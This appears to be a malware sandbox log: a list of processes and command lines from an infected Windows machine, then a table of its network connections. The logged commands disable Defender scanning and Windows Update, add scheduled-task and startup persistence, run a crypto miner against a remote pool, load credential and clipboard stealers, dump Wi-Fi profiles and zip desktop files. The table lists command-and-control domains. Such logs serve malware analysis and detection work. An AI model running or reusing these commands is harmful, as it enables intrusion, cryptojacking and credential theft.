C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe
"C:\Users\Admin\Pictures\p1ZjVvAKBV5XkBUaTd0q2FDb.exe"
C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
"C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5M28V.tmp\zauJwzNDKtlWh0Su7sA66DV7.tmp" /SL5="$1403A2,1697450,56832,C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe
"C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\7FD3.exe
C:\Users\Admin\AppData\Local\Temp\7FD3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe
"C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2064 -ip 2064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 1020
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
"C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --silent --allusers=0
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6c9a21c8,0x6c9a21d4,0x6c9a21e0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --version
C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
"C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\58E.exe
C:\Users\Admin\AppData\Local\Temp\58E.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit
C:\Users\Admin\AppData\Local\Temp\1510.exe
C:\Users\Admin\AppData\Local\Temp\1510.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 8484
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 8484\F
C:\Users\Admin\AppData\Local\Temp\8484\Http.pif
8484\Http.pif 8484\F
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SYSTEM32\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit
C:\Windows\SYSTEM32\cmd.exe
cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
C:\Users\Admin\AppData\Local\Temp\4E32.exe
C:\Users\Admin\AppData\Local\Temp\4E32.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\C95E.exe
C:\Users\Admin\AppData\Local\Temp\C95E.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:443 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --tls --nicehash -o showlock.net:80 --rig-id f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --nicehash --http-port 3433 --http-access-token f5a3ba3d-1cf7-4619-a329-2cfabd831fd0 --randomx-wrmsr=-1
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 1820
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x1000040,0x100004c,0x1000058
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.49.204.15.in-addr.arpa | udp |
| US | 172.67.164.28:443 | namecloudvideo.org | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 172.67.146.202:443 | shipbank.org | tcp |
| US | 8.8.8.8:53 | 28.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.29.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.146.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.174.106.193.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 187.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | 145.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| NL | 185.26.182.112:443 | features.opera-api2.com | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.243:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 122.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| MX | 189.232.56.10:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | 10.56.232.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| US | 8.8.8.8:53 | superemeboxlogosites.pro | udp |
| US | 188.114.96.2:443 | superemeboxlogosites.pro | tcp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | wisemassiveharmonious.shop | udp |
| US | 172.67.181.250:443 | wisemassiveharmonious.shop | tcp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.232.23.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f5a3ba3d-1cf7-4619-a329-2cfabd831fd0.uuid.createupdate.org | udp |
| US | 8.8.8.8:53 | colorfulequalugliess.shop | udp |
| US | 104.21.19.68:443 | colorfulequalugliess.shop | tcp |
| US | 8.8.8.8:53 | 68.19.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | relevantvoicelesskw.shop | udp |
| US | 104.21.33.178:443 | relevantvoicelesskw.shop | tcp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | 178.33.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 104.21.10.242:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 242.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| CH | 172.217.210.127:19302 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.210.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.216.82.185.in-addr.arpa | udp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 82.94.21.104.in-addr.arpa | udp |
| LT | 91.211.247.248:53 | aiueiup.ru | udp |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| US | 8.8.8.8:53 | 248.247.211.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.74.16.195.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | resergvearyinitiani.shop | udp |
| US | 188.114.97.2:443 | resergvearyinitiani.shop | tcp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 104.21.51.243:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 104.21.10.242:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 243.51.21.104.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
